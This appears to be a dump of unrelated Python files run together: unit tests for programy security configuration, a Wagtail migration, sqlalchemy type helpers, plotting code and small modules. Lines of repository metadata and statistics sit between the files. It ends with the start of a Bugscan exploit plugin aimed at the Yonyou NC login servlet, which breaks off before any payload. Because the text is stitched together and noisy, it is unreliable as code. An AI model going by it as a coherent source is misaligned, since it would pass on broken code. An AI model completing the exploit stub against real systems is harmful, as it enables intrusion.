the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import unittest
from programy.config.file.yaml_file import YamlConfigurationFile
from programy.config.brain.security import BrainSecurityAuthorisationConfiguration
from programy.config.brain.security import BrainSecurityAuthenticationConfiguration
from programy.clients.events.console.config import ConsoleConfiguration
class BrainSecurityConfigurationTests(unittest.TestCase):
def test_authorisation_with_data_denied_srai(self):
yaml = YamlConfigurationFile()
self.assertIsNotNone(yaml)
yaml.load_from_text("""
brain:
security:
authorisation:
classname: programy.security.authorise.passthrough.PassThroughAuthorisationService
denied_srai: AUTHORISATION_FAILED
""", ConsoleConfiguration(), ".")
brain_config = yaml.get_section("brain")
self.assertIsNotNone(brain_config)
services_config = yaml.get_section("security", brain_config)
self.assertIsNotNone(services_config)
service_config = BrainSecurityAuthorisationConfiguration()
service_config.load_config_section(yaml, services_config, ".")
self.assertEqual("programy.security.authorise.passthrough.PassThroughAuthorisationService", service_config.classname)
self.assertEqual("AUTHORISATION_FAILED", service_config.denied_srai)
self.assertEqual(BrainSecurityAuthorisationConfiguration.DEFAULT_ACCESS_DENIED, service_config.denied_text)
def test_authorisation_with_data_denied_text(self):
yaml = YamlConfigurationFile()
self.assertIsNotNone(yaml)
yaml.load_from_text("""
brain:
security:
authorisation:
classname: programy.security.authorise.passthrough.PassThroughAuthorisationService
denied_text: Authorisation Failed
""", ConsoleConfiguration(), ".")
brain_config = yaml.get_section("brain")
self.assertIsNotNone(brain_config)
services_config = yaml.get_section("security", brain_config)
self.assertIsNotNone(services_config)
service_config = BrainSecurityAuthorisationConfiguration()
service_config.load_config_section(yaml, services_config, ".")
self.assertEqual("programy.security.authorise.passthrough.PassThroughAuthorisationService", service_config.classname)
self.assertEqual("Authorisation Failed", service_config.denied_text)
self.assertIsNone(service_config.denied_srai)
def test_authorisation_with_data_neither_denied_srai_or_text(self):
yaml = YamlConfigurationFile()
self.assertIsNotNone(yaml)
yaml.load_from_text("""
brain:
security:
authorisation:
classname: programy.security.authorise.passthrough.PassThroughAuthorisationService
""", ConsoleConfiguration(), ".")
brain_config = yaml.get_section("brain")
self.assertIsNotNone(brain_config)
services_config = yaml.get_section("security", brain_config)
self.assertIsNotNone(services_config)
service_config = BrainSecurityAuthorisationConfiguration()
service_config.load_config_section(yaml, services_config, ".")
self.assertEqual("programy.security.authorise.passthrough.PassThroughAuthorisationService", service_config.classname)
self.assertEqual(BrainSecurityAuthorisationConfiguration.DEFAULT_ACCESS_DENIED, service_config.denied_text)
self.assertIsNone(service_config.denied_srai)
def test_authentication_with_data_denied_srai(self):
yaml = YamlConfigurationFile()
self.assertIsNotNone(yaml)
yaml.load_from_text("""
brain:
security:
authentication:
classname: programy.security.authenticate.passthrough.PassThroughAuthenticationService
denied_srai: AUTHENTICATION_FAILED
""", ConsoleConfiguration(), ".")
brain_config = yaml.get_section("brain")
self.assertIsNotNone(brain_config)
services_config = yaml.get_section("security", brain_config)
self.assertIsNotNone(services_config)
service_config = BrainSecurityAuthenticationConfiguration()
service_config.load_config_section(yaml, services_config, ".")
self.assertEqual("programy.security.authenticate.passthrough.PassThroughAuthenticationService", service_config.classname)
self.assertEqual("AUTHENTICATION_FAILED", service_config.denied_srai)
self.assertEqual(BrainSecurityAuthenticationConfiguration.DEFAULT_ACCESS_DENIED, service_config.denied_text)
def test_authentication_with_data_denied_text(self):
yaml = YamlConfigurationFile()
self.assertIsNotNone(yaml)
yaml.load_from_text("""
brain:
security:
authentication:
classname: programy.security.authenticate.passthrough.PassThroughAuthenticationService
denied_text: Authentication failed
""", ConsoleConfiguration(), ".")
brain_config = yaml.get_section("brain")
self.assertIsNotNone(brain_config)
services_config = yaml.get_section("security", brain_config)
self.assertIsNotNone(services_config)
service_config = BrainSecurityAuthenticationConfiguration()
service_config.load_config_section(yaml, services_config, ".")
self.assertEqual("programy.security.authenticate.passthrough.PassThroughAuthenticationService", service_config.classname)
self.assertEqual("Authentication failed", service_config.denied_text)
self.assertIsNone(service_config.denied_srai)
def test_authentication_with_data_neither_denied_srai_or_text(self):
yaml = YamlConfigurationFile()
self.assertIsNotNone(yaml)
yaml.load_from_text("""
brain:
security:
authentication:
classname: programy.security.authenticate.passthrough.PassThroughAuthenticationService
""", ConsoleConfiguration(), ".")
brain_config = yaml.get_section("brain")
self.assertIsNotNone(brain_config)
services_config = yaml.get_section("security", brain_config)
self.assertIsNotNone(services_config)
service_config = BrainSecurityAuthenticationConfiguration()
service_config.load_config_section(yaml, services_config, ".")
self.assertEqual("programy.security.authenticate.passthrough.PassThroughAuthenticationService", service_config.classname)
self.assertEqual(BrainSecurityAuthenticationConfiguration.DEFAULT_ACCESS_DENIED, service_config.denied_text)
self.assertEqual(BrainSecurityAuthenticationConfiguration.DEFAULT_ACCESS_DENIED, service_config.denied_text)
| 49.006211 | 129 | 0.735488 | 747 | 7,890 | 7.542169 | 0.188755 | 0.069223 | 0.027689 | 0.042599 | 0.79819 | 0.795882 | 0.774405 | 0.772985 | 0.772985 | 0.770501 | 0 | 0.000627 | 0.191255 | 7,890 | 160 | 130 | 49.3125 | 0.882307 | 0.134601 | 0 | 0.830508 | 0 | 0 | 0.281965 | 0.134604 | 0 | 0 | 0 | 0 | 0.305085 | 1 | 0.050847 | false | 0.101695 | 0.042373 | 0 | 0.101695 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
9fb36c76c0f027c09d1a14f3ed61c4c5fba3b1ea | 164 | py | Python | sic_financeiro/core/models/__init__.py | diegoMasin/project-sic-financeiro | a06d4c873014e0835afa37437ad8f57c24f78163 | [
"MIT"
] | null | null | null | sic_financeiro/core/models/__init__.py | diegoMasin/project-sic-financeiro | a06d4c873014e0835afa37437ad8f57c24f78163 | [
"MIT"
] | null | null | null | sic_financeiro/core/models/__init__.py | diegoMasin/project-sic-financeiro | a06d4c873014e0835afa37437ad8f57c24f78163 | [
"MIT"
] | null | null | null | from sic_financeiro.core.models.contas import Conta
from sic_financeiro.core.models.tags import Tag
from sic_financeiro.core.models.tipo_despesa import TipoDespesa
| 41 | 63 | 0.871951 | 25 | 164 | 5.56 | 0.52 | 0.151079 | 0.366906 | 0.453237 | 0.582734 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.073171 | 164 | 3 | 64 | 54.666667 | 0.914474 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
4cd16d12961de1ebd54ce8ecce9a9f41a432ec9c | 213 | py | Python | neuro_logging/testing_utils.py | neuro-inc/neuro-logging | e3173a40d0e2559f113f1420ed8a3fd4a0e76dde | [
"Apache-2.0"
] | null | null | null | neuro_logging/testing_utils.py | neuro-inc/neuro-logging | e3173a40d0e2559f113f1420ed8a3fd4a0e76dde | [
"Apache-2.0"
] | 50 | 2021-08-20T00:10:05.000Z | 2022-02-21T16:44:46.000Z | neuro_logging/testing_utils.py | neuro-inc/neuro-logging | e3173a40d0e2559f113f1420ed8a3fd4a0e76dde | [
"Apache-2.0"
] | null | null | null | # shim file for testing purpose,
# _find_caller_version() should be called from a package
from neuro_logging.trace import _find_caller_version
def _get_test_version() -> str:
return _find_caller_version(1)
| 23.666667 | 56 | 0.793427 | 32 | 213 | 4.875 | 0.75 | 0.192308 | 0.326923 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005495 | 0.14554 | 213 | 8 | 57 | 26.625 | 0.851648 | 0.399061 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0.333333 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
4cf415afee101a6a4d308d53426f8649f55baad0 | 11,500 | py | Python | bc/inlineindex/migrations/0001_initial.py | Buckinghamshire-Digital-Service/buckinghamshire-council | bbbdb52b515bcdfc79a2bd9198dfa4828405370e | [
"BSD-3-Clause"
] | 1 | 2021-02-27T07:27:17.000Z | 2021-02-27T07:27:17.000Z | bc/inlineindex/migrations/0001_initial.py | Buckinghamshire-Digital-Service/buckinghamshire-council | bbbdb52b515bcdfc79a2bd9198dfa4828405370e | [
"BSD-3-Clause"
] | null | null | null | bc/inlineindex/migrations/0001_initial.py | Buckinghamshire-Digital-Service/buckinghamshire-council | bbbdb52b515bcdfc79a2bd9198dfa4828405370e | [
"BSD-3-Clause"
] | 1 | 2021-06-09T15:56:54.000Z | 2021-06-09T15:56:54.000Z | # Generated by Django 2.2.9 on 2019-12-19 22:10
import django.db.models.deletion
from django.db import migrations, models
import wagtail.core.blocks
import wagtail.core.fields
class Migration(migrations.Migration):
initial = True
dependencies = [
("wagtailcore", "0041_group_collection_permissions_verbose_name_plural"),
]
operations = [
migrations.CreateModel(
name="InlineIndex",
fields=[
(
"page_ptr",
models.OneToOneField(
auto_created=True,
on_delete=django.db.models.deletion.CASCADE,
parent_link=True,
primary_key=True,
serialize=False,
to="wagtailcore.Page",
),
),
(
"subtitle",
models.CharField(
default="Introduction",
help_text="Title that appears on the index. (e.g. Introduction)",
max_length=255,
),
),
(
"body",
wagtail.core.fields.StreamField(
[
(
"heading",
wagtail.core.blocks.CharBlock(
classname="full title",
icon="title",
template="patterns/molecules/streamfield/blocks/heading_block.html",
),
),
(
"paragraph",
wagtail.core.blocks.RichTextBlock(
features=[
"bold",
"italic",
"ol",
"ul",
"link",
"document-link",
]
),
),
(
"local_area_links",
wagtail.core.blocks.StructBlock(
[
(
"introduction",
wagtail.core.blocks.RichTextBlock(
default="<p>Select your local area for information:</p>",
features=[
"bold",
"italic",
"ol",
"ul",
"link",
"document-link",
],
),
),
(
"aylesbury_vale_url",
wagtail.core.blocks.URLBlock(
label="Aylesbury Vale URL",
required=False,
),
),
(
"chiltern_url",
wagtail.core.blocks.URLBlock(
label="Chiltern URL", required=False
),
),
(
"south_bucks_url",
wagtail.core.blocks.URLBlock(
label="South Bucks URL", required=False
),
),
(
"wycombe_url",
wagtail.core.blocks.URLBlock(
label="Wycombe URL", required=False
),
),
(
"postscript",
wagtail.core.blocks.RichTextBlock(
default='<p>Or <a href="https://www.gov.uk/find-local-council">click here</a> to find your area based on your postcode.</p>',
features=[
"bold",
"italic",
"ol",
"ul",
"link",
"document-link",
],
required=False,
),
),
]
),
),
]
),
),
],
options={"abstract": False,},
bases=("wagtailcore.page",),
),
migrations.CreateModel(
name="InlineIndexChild",
fields=[
(
"page_ptr",
models.OneToOneField(
auto_created=True,
on_delete=django.db.models.deletion.CASCADE,
parent_link=True,
primary_key=True,
serialize=False,
to="wagtailcore.Page",
),
),
(
"body",
wagtail.core.fields.StreamField(
[
(
"heading",
wagtail.core.blocks.CharBlock(
classname="full title",
icon="title",
template="patterns/molecules/streamfield/blocks/heading_block.html",
),
),
(
"paragraph",
wagtail.core.blocks.RichTextBlock(
features=[
"bold",
"italic",
"ol",
"ul",
"link",
"document-link",
]
),
),
(
"local_area_links",
wagtail.core.blocks.StructBlock(
[
(
"introduction",
wagtail.core.blocks.RichTextBlock(
default="<p>Select your local area for information:</p>",
features=[
"bold",
"italic",
"ol",
"ul",
"link",
"document-link",
],
),
),
(
"aylesbury_vale_url",
wagtail.core.blocks.URLBlock(
label="Aylesbury Vale URL",
required=False,
),
),
(
"chiltern_url",
wagtail.core.blocks.URLBlock(
label="Chiltern URL", required=False
),
),
(
"south_bucks_url",
wagtail.core.blocks.URLBlock(
label="South Bucks URL", required=False
),
),
(
"wycombe_url",
wagtail.core.blocks.URLBlock(
label="Wycombe URL", required=False
),
),
(
"postscript",
wagtail.core.blocks.RichTextBlock(
default='<p>Or <a href="https://www.gov.uk/find-local-council">click here</a> to find your area based on your postcode.</p>',
features=[
"bold",
"italic",
"ol",
"ul",
"link",
"document-link",
],
required=False,
),
),
]
),
),
]
),
),
],
options={"abstract": False,},
bases=("wagtailcore.page",),
),
]
| 47.520661 | 173 | 0.220087 | 442 | 11,500 | 5.644796 | 0.280543 | 0.096994 | 0.129459 | 0.064128 | 0.821643 | 0.821643 | 0.821643 | 0.821643 | 0.821643 | 0.821643 | 0 | 0.00679 | 0.718261 | 11,500 | 241 | 174 | 47.717842 | 0.763272 | 0.003913 | 0 | 0.781116 | 1 | 0.008584 | 0.10888 | 0.014407 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.017167 | 0 | 0.034335 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
4cfcd64060161d716d88575c8a0ec4caae4d9d39 | 112 | py | Python | tests/test_utils.py | elstevi/libbhyve | 9d746073b80fc21d58d7931a21a891836d0748a6 | [
"BSD-2-Clause"
] | 1 | 2020-06-18T17:58:01.000Z | 2020-06-18T17:58:01.000Z | tests/test_utils.py | elstevi/libbhyve | 9d746073b80fc21d58d7931a21a891836d0748a6 | [
"BSD-2-Clause"
] | null | null | null | tests/test_utils.py | elstevi/libbhyve | 9d746073b80fc21d58d7931a21a891836d0748a6 | [
"BSD-2-Clause"
] | null | null | null | import pytest
from libbhyve.utils import log
def test_log():
assert log('crit', 'world') == "[crit] world"
| 18.666667 | 49 | 0.678571 | 16 | 112 | 4.6875 | 0.6875 | 0.24 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.169643 | 112 | 5 | 50 | 22.4 | 0.806452 | 0 | 0 | 0 | 0 | 0 | 0.1875 | 0 | 0 | 0 | 0 | 0 | 0.25 | 1 | 0.25 | true | 0 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
e24c8a9efc3697032166cdea2148f93cda8a5b57 | 77 | py | Python | pclpy/view/__init__.py | toinsson/pclpy | e44d261c4996bc5fd4080bf813542ccdffbca601 | [
"MIT"
] | 293 | 2018-05-21T21:50:11.000Z | 2022-03-30T02:43:08.000Z | pclpy/view/__init__.py | toinsson/pclpy | e44d261c4996bc5fd4080bf813542ccdffbca601 | [
"MIT"
] | 97 | 2018-04-23T20:45:20.000Z | 2022-03-28T09:00:25.000Z | pclpy/view/__init__.py | toinsson/pclpy | e44d261c4996bc5fd4080bf813542ccdffbca601 | [
"MIT"
] | 56 | 2018-05-16T08:59:09.000Z | 2022-02-24T02:21:11.000Z |
from pclpy.view.cloudcompare import cloudcompare
from pclpy.view import vtk | 19.25 | 48 | 0.844156 | 11 | 77 | 5.909091 | 0.545455 | 0.276923 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.116883 | 77 | 4 | 49 | 19.25 | 0.955882 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
e27801e662da382246d346122a3a292d5cf33927 | 69 | py | Python | VTree/vtree/__init__.py | MarcoMuellner/VTree | c4bd509daeb80652075df1937b5861fa3e281dff | [
"MIT"
] | null | null | null | VTree/vtree/__init__.py | MarcoMuellner/VTree | c4bd509daeb80652075df1937b5861fa3e281dff | [
"MIT"
] | null | null | null | VTree/vtree/__init__.py | MarcoMuellner/VTree | c4bd509daeb80652075df1937b5861fa3e281dff | [
"MIT"
] | null | null | null | from VTree.vtree.VTree import VTree
from VTree.vtree.Node import Node | 34.5 | 35 | 0.84058 | 12 | 69 | 4.833333 | 0.333333 | 0.517241 | 0.482759 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.101449 | 69 | 2 | 36 | 34.5 | 0.935484 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
e298bb8bb616ba4db97bb5f236bb14ddb4a5171e | 1,276 | py | Python | sqlhandler/custom/field.py | matthewgdv/sqlhandler | b82fd159195f6bb63175bb8a8d81fc421e7d5835 | [
"MIT"
] | null | null | null | sqlhandler/custom/field.py | matthewgdv/sqlhandler | b82fd159195f6bb63175bb8a8d81fc421e7d5835 | [
"MIT"
] | null | null | null | sqlhandler/custom/field.py | matthewgdv/sqlhandler | b82fd159195f6bb63175bb8a8d81fc421e7d5835 | [
"MIT"
] | null | null | null | from __future__ import annotations
from sqlalchemy import types
from subtypes import DateTime, Date
class BitLiteral(types.TypeDecorator):
impl = types.DateTime
def process_literal_param(self, value, dialect):
return str(int(value))
class SubtypesDateTime(types.TypeDecorator):
impl = types.DateTime
string = types.String()
def process_bind_param(self, value, dialect):
return None if value is None else DateTime.infer(value).to_isoformat()
def process_literal_param(self, value, dialect):
return None if value is None else self.string.literal_processor(dialect)(DateTime.infer(value).to_isoformat())
def process_result_value(self, value, dialect):
return None if value is None else DateTime.infer(value)
class SubtypesDate(types.TypeDecorator):
impl = types.Date
string = types.String()
def process_bind_param(self, value, dialect):
return None if value is None else Date.infer(value).to_isoformat()
def process_literal_param(self, value, dialect):
return None if value is None else self.string.literal_processor(dialect)(Date.infer(value).to_isoformat())
def process_result_value(self, value, dialect):
return None if value is None else Date.infer(value)
| 31.121951 | 118 | 0.734326 | 171 | 1,276 | 5.339181 | 0.210526 | 0.07667 | 0.122673 | 0.168675 | 0.806134 | 0.729463 | 0.729463 | 0.71632 | 0.668127 | 0.668127 | 0 | 0 | 0.181034 | 1,276 | 40 | 119 | 31.9 | 0.873684 | 0 | 0 | 0.44 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.28 | false | 0 | 0.12 | 0.28 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 8 |
2c61d4849e47a71765b84f72bc8e34a5430fe083 | 10,004 | py | Python | graphical_analysis/query_scenario_additional_operators_analysis.py | sjuenger/WikiMETA | 13ed293b4bda8ff0fc10b532907ca35c24a12616 | [
"MIT"
] | null | null | null | graphical_analysis/query_scenario_additional_operators_analysis.py | sjuenger/WikiMETA | 13ed293b4bda8ff0fc10b532907ca35c24a12616 | [
"MIT"
] | null | null | null | graphical_analysis/query_scenario_additional_operators_analysis.py | sjuenger/WikiMETA | 13ed293b4bda8ff0fc10b532907ca35c24a12616 | [
"MIT"
] | null | null | null | import os
import json
import seaborn as sns
import matplotlib.pyplot as plt
import pandas as pd
# plot only the NON-redundant data
def plot_additional_second_level_operator_information_about_scenarios_per_timeframe_for_OPTIONAL(timeframes,
metadata,
scenario):
if metadata not in ["reference_metadata", "rank_metadata", "qualifier_metadata"]:
raise Exception
if scenario not in ["optional"]:
raise Exception
csv_ready_scenario_dict = {}
csv_ready_scenario_dict["timeframe"] = []
csv_ready_scenario_dict["datatype"] = []
csv_ready_scenario_dict["base scenario"] = []
csv_ready_scenario_dict["operator name"] = []
csv_ready_scenario_dict["operator count"] = []
csv_ready_scenario_dict["operator percentage"] = []
csv_ready_scenario_dict["total operators"] = []
for timeframe in timeframes:
# get the path to the location information of the timeframe scenario data per
# datatype
information_path = "data/" + timeframe[:21] + "/" + timeframe[22:] + \
"/" + metadata + \
"/scenarios/non_redundant/" + scenario + "_statistical_information.json"
if os.path.exists(information_path):
with open(information_path, "r") as stat_info_scenarios_data:
stat_info_scenarios_dict = json.load(stat_info_scenarios_data)
for operator in stat_info_scenarios_dict["in_found_prop_path_found_operators_overall"]:
csv_ready_scenario_dict["operator name"].append(operator)
csv_ready_scenario_dict["operator count"]. \
append(stat_info_scenarios_dict["in_found_prop_path_found_operators_overall"][operator])
total_occurrences = stat_info_scenarios_dict["in_found_prop_path_total_found_operators"]
if total_occurrences > 0:
csv_ready_scenario_dict["operator percentage"]. \
append(
int(stat_info_scenarios_dict["in_found_prop_path_found_operators_overall"][operator]) /
total_occurrences)
else:
csv_ready_scenario_dict["operator percentage"]. \
append(0)
csv_ready_scenario_dict["total operators"].append(total_occurrences)
csv_ready_scenario_dict["timeframe"]. \
append(timeframe[:21].replace("_", "-\n"))
csv_ready_scenario_dict["datatype"].append(metadata)
csv_ready_scenario_dict["base scenario"].append(scenario)
# insert the total data
overall_information_path = "data/statistical_information/query_research/" + "non_redundant" + \
"/" + metadata + "/scenarios/additional_layer/" \
+ scenario +"_statistical_information.json"
with open(overall_information_path, "r") as overall_data:
overall_dict = json.load(overall_data)
for operator in overall_dict["in_found_prop_path_found_operators_overall"]:
csv_ready_scenario_dict["operator name"].append(operator)
csv_ready_scenario_dict["operator count"]. \
append(overall_dict["in_found_prop_path_found_operators_overall"][operator])
total_occurrences = overall_dict["in_found_prop_path_total_found_operators"]
if total_occurrences > 0:
csv_ready_scenario_dict["operator percentage"]. \
append(
int(overall_dict["in_found_prop_path_found_operators_overall"][operator]) /
total_occurrences)
else:
csv_ready_scenario_dict["operator percentage"]. \
append(0)
csv_ready_scenario_dict["total operators"].append(total_occurrences)
csv_ready_scenario_dict["timeframe"]. \
append("total")
csv_ready_scenario_dict["datatype"].append(metadata)
csv_ready_scenario_dict["base scenario"].append(scenario)
# plot the data in a heatmap
tmp_dict = {}
tmp_dict["operator name"] = []
tmp_dict["timeframe"] = []
tmp_dict["operator percentage"] = []
for i in range(len(csv_ready_scenario_dict["timeframe"])):
tmp_dict["operator name"].append(csv_ready_scenario_dict["operator name"][i])
tmp_dict["timeframe"].append(csv_ready_scenario_dict["timeframe"][i])
tmp_dict["operator percentage"].append(\
csv_ready_scenario_dict["operator percentage"][i])
df = pd.DataFrame(tmp_dict)
df = pd.pivot_table(data=df,
index='operator name',
values='operator percentage',
columns='timeframe', sort=True)
mask = (df == 0)
fig, ax = plt.subplots(figsize=(9, 5)) # 16 10
tmp = sns.heatmap(df, ax=ax, annot=True, vmin = 0, vmax = 1, mask=mask, cmap="Reds",
linewidths=.5)
tmp.figure.tight_layout()
tmp.figure.subplots_adjust(left=0.15, bottom=0.3)
# set the yticks "upright" with 0, as opposed to sideways with 90
plt.yticks(rotation=0)
plt.gcf().autofmt_xdate()
save_path = "data/statistical_information/query_research/non_redundant/" \
+ metadata + "/scenarios/additional_layer/" + \
scenario + "_prop_path_operators.pdf"
tmp.get_figure().savefig(save_path)
plt.close()
# plot only the NON-redundant data
def plot_additional_second_level_operator_information_about_scenarios_per_datatype_for_OPTIONAL(timeframes,
metadata,
scenario):
if metadata not in ["reference_metadata", "rank_metadata", "qualifier_metadata"]:
raise Exception
if scenario not in ["optional"]:
raise Exception
csv_ready_scenario_dict = {}
csv_ready_scenario_dict["datatype"] = []
csv_ready_scenario_dict["base scenario"] = []
csv_ready_scenario_dict["operator name"] = []
csv_ready_scenario_dict["operator count"] = []
csv_ready_scenario_dict["operator percentage"] = []
csv_ready_scenario_dict["total operators"] = []
# insert the total data
overall_information_path = "data/statistical_information/query_research/" + "non_redundant" + \
"/" + metadata + "/scenarios/additional_layer/" \
+ scenario +"_statistical_information.json"
with open(overall_information_path, "r") as overall_data:
overall_dict = json.load(overall_data)
for datatype in overall_dict["in_found_prop_path_found_operators_per_datatype"]:
for operator in overall_dict["in_found_prop_path_found_operators_per_datatype"][datatype]:
csv_ready_scenario_dict["operator name"].append(operator)
csv_ready_scenario_dict["operator count"]. \
append(overall_dict["in_found_prop_path_found_operators_per_datatype"][datatype][operator])
total_occurrences = overall_dict["in_found_prop_path_total_found_operators"]
if total_occurrences > 0:
csv_ready_scenario_dict["operator percentage"]. \
append(
int(overall_dict["in_found_prop_path_found_operators_per_datatype"][datatype][operator]) /
total_occurrences)
else:
csv_ready_scenario_dict["operator percentage"]. \
append(0)
csv_ready_scenario_dict["total operators"].append(total_occurrences)
# e.g. reference_metadata/only_derived -> only_derived
csv_ready_scenario_dict["datatype"].append(datatype.split("/")[1].
replace("_+_", " +\n").
replace("e_", "e\n"))
csv_ready_scenario_dict["base scenario"].append(scenario)
# plot the data in a heatmap
tmp_dict = {}
tmp_dict["operator name"] = []
tmp_dict["datatype"] = []
tmp_dict["operator percentage"] = []
for i in range(len(csv_ready_scenario_dict["datatype"])):
tmp_dict["operator name"].append(csv_ready_scenario_dict["operator name"][i])
tmp_dict["datatype"].append(csv_ready_scenario_dict["datatype"][i])
tmp_dict["operator percentage"].append(\
csv_ready_scenario_dict["operator percentage"][i])
df = pd.DataFrame(tmp_dict)
df = pd.pivot_table(data=df,
index='operator name',
values='operator percentage',
columns='datatype', sort=True)
mask = (df == 0)
fig, ax = plt.subplots(figsize=(6, 6))
tmp = sns.heatmap(df, ax=ax, annot=True, vmin = 0, vmax = 1, mask=mask, cmap="Greys",
linewidths=.5)
tmp.figure.subplots_adjust()
tmp.figure.tight_layout()
tmp.figure.subplots_adjust(left=0.15, bottom=0)
# set the yticks "upright" with 0, as opposed to sideways with 90
plt.yticks(rotation=0)
plt.gcf().autofmt_xdate()
save_path = "data/statistical_information/query_research/non_redundant/" \
+ metadata + "/scenarios/additional_layer/" + \
scenario + "_prop_path_operators_per_datatype.pdf"
tmp.get_figure().savefig(save_path)
plt.close()
| 41.510373 | 115 | 0.592463 | 1,041 | 10,004 | 5.332373 | 0.132565 | 0.066294 | 0.132589 | 0.165736 | 0.883805 | 0.863268 | 0.857143 | 0.857143 | 0.85408 | 0.840389 | 0 | 0.00667 | 0.310576 | 10,004 | 240 | 116 | 41.683333 | 0.798173 | 0.043683 | 0 | 0.701863 | 0 | 0 | 0.216372 | 0.109808 | 0.012422 | 0 | 0 | 0 | 0 | 1 | 0.012422 | false | 0 | 0.031056 | 0 | 0.043478 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
2c668aa48dc5db25540507a87523989f031dc268 | 2,434 | py | Python | Bugscan_exploits-master/exp_list/exp-1723.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 11 | 2020-05-30T13:53:49.000Z | 2021-03-17T03:20:59.000Z | Bugscan_exploits-master/exp_list/exp-1723.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 6 | 2020-05-13T03:25:18.000Z | 2020-07-21T06:24:16.000Z | Bugscan_exploits-master/exp_list/exp-1723.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 6 | 2020-05-30T13:53:51.000Z | 2020-12-01T21:44:26.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#author:小光
#refer:http://www.wooyun.org/bugs/wooyun-2015-0138680
import time
def assign(service, arg):
if service == "yongyou_nc":
return True, arg
def audit(arg):
url = arg + 'nc/servlet/nc.ui.iufo.login.LoginUI'
postdatas ={
